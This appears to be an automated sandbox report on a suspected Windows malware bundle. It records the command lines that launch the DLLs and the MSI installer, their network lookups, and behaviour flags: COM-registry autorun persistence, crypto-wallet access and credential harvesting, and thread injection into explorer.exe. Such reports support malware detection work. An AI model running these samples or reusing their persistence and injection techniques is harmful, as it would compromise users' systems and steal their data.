"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4304,i,11749492925348081608,8895412282206755658,262144 --variations-seed-version --mojo-platform-channel-handle=4028 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

92s

Max time network

98s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Wpc\DispBroker.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Wpc\DispBroker.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 160.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Wpc\wpnsruprov.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Wpc\wpnsruprov.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 74.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

54s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\comuid\FXSCOMPOSE.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\comuid\FXSCOMPOSE.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ifsutil\Windows.Media.Audio.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ifsutil\Windows.Media.Audio.dll,#1

Network

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

120s

Max time network

98s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ifsutil\ieproxy.dll

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ifsutil\\ieproxy.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CD45F185-1B21-48E2-967B-EAD743A8914E}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{01463365-9A8D-4602-9AAC-40754A8C0750} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{42D770B2-A093-4BC5-B67F-A1FAF560F8F1}\NumMethods\ = "11" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D91B8947-F8CA-4508-A58A-2D8A49BF6111}\ = "ILinksBand" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{57B6C80A-34C2-4602-BC26-66A02FC57153}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1E1760CE-126F-46CA-9734-91A6CBF8B6F3}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79EAC9C4-BAF9-11CE-8C82-00AA004BA90B}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A71A0808-0F88-11D1-BA19-00C04FD912D0}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6CBEF08D-65A6-446E-B291-255624568192}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9F8F5A55-2564-4E24-902D-83C7D096D3D7}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D8D2DDA0-FD33-4B6A-9A67-E8C9FB471034}\ = "IMshtmlTabBrowserService" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79EAC9D5-BAF9-11CE-8C82-00AA004BA90B}\NumMethods\ = "12" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{57B6C80A-34C2-4602-BC26-66A02FC57153} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B2AE522-F16F-40CE-A7CA-FF6D78AEA699}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DA0BABDC-1184-4108-AED3-20CB6DF92864}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{382D337F-8AD7-41BD-9EEF-E5811C3CAE8A} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{146E5396-3B32-49AC-901E-4C4A82FEE8C5}\ = "AsyncIeAxiAdminInstaller" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E322340-E4A8-4292-9D52-24E5B7B08253}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41B68150-904C-4E17-A0BA-A438182E359D} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{eaba9a78-1f52-4fa7-adbd-e0583c197cd3}\ = "IDualEngine9Browser" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7847EC01-2BEC-11D0-82B4-00A0C90C29C5}\NumMethods\ = "5" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B523345E-DE24-48CE-8E1A-2CB09F6613CF}\NumMethods\ = "18" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3F457174-09A5-493D-A222-A2385C138A25}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A8C1E1BF-3C81-4AED-9BAD-52E89EB4081F} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4FC45C4-ABDD-47CB-AF94-8697249A8558}\ = "ILayerState" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59891E8C-933E-46B9-9EC2-9F3E9A21C0FE}\NumMethods\ = "53" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E5C2EEFC-C0FD-44A0-9B79-DC8756CC87E0} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5357E238-FB12-4ACA-A930-CAB7832B84BF}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B722BCC6-4E68-101B-A2BC-00AA00404770} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{90C7AF4D-953E-438C-9AF4-8977780187EC}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3C374A41-BAE4-11CF-BF7D-00AA006946EE} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C69B4F68-80F4-4A36-AB70-9C73A8B2A6BF}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74AFF92-5B45-477B-8630-61D5CBED416A}\NumMethods\ = "5" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C62F453C-42AF-40A1-8277-692C4D56E24E}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B1F00D3B-1F06-5117-93EA-2A0D79116701}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4FC45C4-ABDD-47CB-AF94-8697249A8558}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A9E1BD38-0BBE-4ED0-9410-E9B7E5F081EC}\NumMethods\ = "8" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4F9F9FCB-E0F4-48EB-B7AB-FA2EA9365CB4}\ = "IHttpNegotiate2" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{912A1BFD-2B31-465B-9931-C7BE207AFFB9} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{51425BEC-A305-46E1-80F9-04643A9549B9}\NumMethods\ = "5" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A2D6065A-23CD-45D9-8A32-39FD7EC931D5}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}\ = "IEUserBroker" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79EAC9C2-BAF9-11CE-8C82-00AA004BA90B} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C10DBF75-C96B-4A7D-AF1A-BA4C6D9E80FC}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3050F804-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58562769-ED52-42F7-8403-4963514E1F11}\ = "IActiveScriptStringCompare" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58562769-ED52-42F7-8403-4963514E1F11}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{87668C47-9112-40F9-9917-C88246065942}\NumMethods\ = "51" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5664125F-4E10-4E90-98E4-E4513D955A14}\NumMethods\ = "6" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B295AC62-04D1-476B-967D-364442B4EF74}\NumMethods\ = "6" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{850AF9D6-7309-40B5-BDB8-786C106B2153}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3F457174-09A5-493D-A222-A2385C138A25} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F2157B59-546A-4DF2-AD32-E79823CE0A06}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B722BCC5-4E68-101B-A2BC-00AA00404770} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{17baae4f-5e7e-4ede-95c7-5175298795e0} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{631f9262-b99a-4a5c-931a-eb9bd5233f4c}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58062EA0-B932-4785-8239-84EEA4914482} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{305104A7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32\ = "{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1CFF808F-63F9-4485-BB6A-B05C2E9F9EC5}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E8E8D427-EF1B-4491-8E0D-3BAE38974C3E}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D007F76-28B3-4B67-9E05-3AFFFA6D29C7}\ = "IDualEngineNavigation" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{401062AC-2F9C-426E-91A2-4AF5BEAD509F}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ifsutil\ieproxy.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 160.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

158s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32___.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32___.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

116s

Max time network

122s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 224 set thread context of 1956 N/A C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter64.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI3BB3.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{BBE5952A-F463-497C-A9A4-78BD3C7D6038} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5308.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3C22.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3C43.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3AD6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3BD3.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e573a5d.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e573a59.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e573a59.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3B64.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
